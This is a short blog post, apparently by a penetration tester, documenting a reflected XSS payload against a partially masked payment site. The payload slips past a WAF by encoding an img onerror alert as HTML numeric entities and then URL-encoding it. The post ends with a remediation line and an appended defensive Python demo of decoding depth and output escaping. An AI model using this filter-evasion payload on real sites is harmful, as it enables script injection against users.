Bypassing a WAF: XSS

While testing a site today I learned a new fancy XSS bypass, so I'm writing it down for future reference.

WAF bypass, generic vulnerability: reflected cross-site scripting

The WAF only decoded and filtered the URL-encoding layer; it did not inspect the Unicode (HTML numeric entity) encoding underneath, so the check could be bypassed by encoding the payload a second time.

Payload: https://paypre-s**dc********.com/app/recharge/gateway/queryReturnAmt.do?callback=<img src+=x+onerror+="%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041">

Plain tag XSS

https://paypre-s**dc********.com/app/recharge/gateway/queryReturnAmt.do?callback=<img src+=x+onerror+="javascript:alert('XSS')">

First, encode the JavaScript as HTML numeric entities:

https://paypre-s**dc********.com/app/recharge/gateway/queryReturnAmt.do?callback=<img src+=x+onerror+="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

Then URL-encode the whole thing uniformly (& becomes %26, # becomes %23):

https://paypre-s**dc********.com/app/recharge/gateway/queryReturnAmt.do?callback=<img src+=x+onerror+="%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041">

Remediation:
HTML-entity-escape every user-controllable front-end parameter before it is reflected into the page.
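As an added example that is not part of the original post, the Python script below (standard library only) reproduces the two decoding layers the post describes and shows why a WAF that URL-decodes once misses the entity-encoded value, how a filter that canonicalizes the input catches it, and how the recommended fix (HTML-entity-escaping the reflected parameter) neutralizes it regardless of the WAF. The sample strings are taken from the post's payload; treating `+` as a URL-encoded space is an assumption, as is the small signature list the toy WAF uses.

```python
import html
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample: the onerror value from the post, encoded twice
# (HTML numeric entities, then URL-encoded so '&' -> %26 and '#' -> %23).
ENTITY_PAYLOAD = (
    "%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115"
    "%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116"
    "%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114"
    "%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083"
    "%26%230000083%26%230000039%26%230000041"
)

# The full reflected parameter as it travels in the URL. Assumption: the '+'
# characters in the post are URL-encoded spaces.
CALLBACK_PARAM = '<img src+=x+onerror+="' + ENTITY_PAYLOAD + '">'

# Assumed signature list for a toy WAF that inspects event-handler values.
DANGEROUS = re.compile(r"javascript\s*:|alert\s*\(|<script", re.IGNORECASE)


def waf_view_single_decode(value: str) -> str:
    """What a WAF that URL-decodes exactly once sees: a run of HTML numeric
    entities that contains none of the signatures above."""
    return unquote(value)


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Defender-side normalization: peel URL-encoding layers until the string
    stops changing, then resolve HTML entities. This approximates what the
    browser ends up evaluating once the server reflects the parameter."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return html.unescape(value)


def naive_waf_blocks(value: str) -> bool:
    """Single-decode WAF: misses the payload from the post."""
    return bool(DANGEROUS.search(waf_view_single_decode(value)))


def normalizing_waf_blocks(value: str) -> bool:
    """Canonicalizing WAF: sees the decoded JavaScript and blocks it."""
    return bool(DANGEROUS.search(canonicalize(value)))


def reflect_unsafe(callback: str) -> str:
    """Vulnerable pattern: the server URL-decodes the parameter and writes it
    into the response verbatim, leaving the browser to decode the entities."""
    return unquote_plus(callback)


def reflect_safe(callback: str) -> str:
    """The post's fix: HTML-entity-escape the user-controlled parameter.
    '&' becomes '&amp;', so the inner entity layer is never decoded by the
    browser, and '<', '>' and quotes are neutralized as well."""
    return html.escape(unquote_plus(callback), quote=True)


if __name__ == "__main__":
    print("WAF sees:       ", waf_view_single_decode(ENTITY_PAYLOAD)[:40], "...")
    print("browser decodes:", canonicalize(ENTITY_PAYLOAD))
    print("naive WAF blocks:      ", naive_waf_blocks(ENTITY_PAYLOAD))
    print("normalizing WAF blocks:", normalizing_waf_blocks(ENTITY_PAYLOAD))
    print("unsafe reflection:", reflect_unsafe(CALLBACK_PARAM)[:50], "...")
    print("safe reflection:  ", reflect_safe(CALLBACK_PARAM)[:50], "...")
```

The point of `canonicalize` is that a filter must decode to the same depth the consumer (here, the browser's attribute parser) will, or compare against an output-escaped value; `reflect_safe` shows that escaping at the output boundary makes the WAF's decoding depth irrelevant.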

This blogger takes life as it comes and writes for his own amusement; if you don't like it, please don't flame.
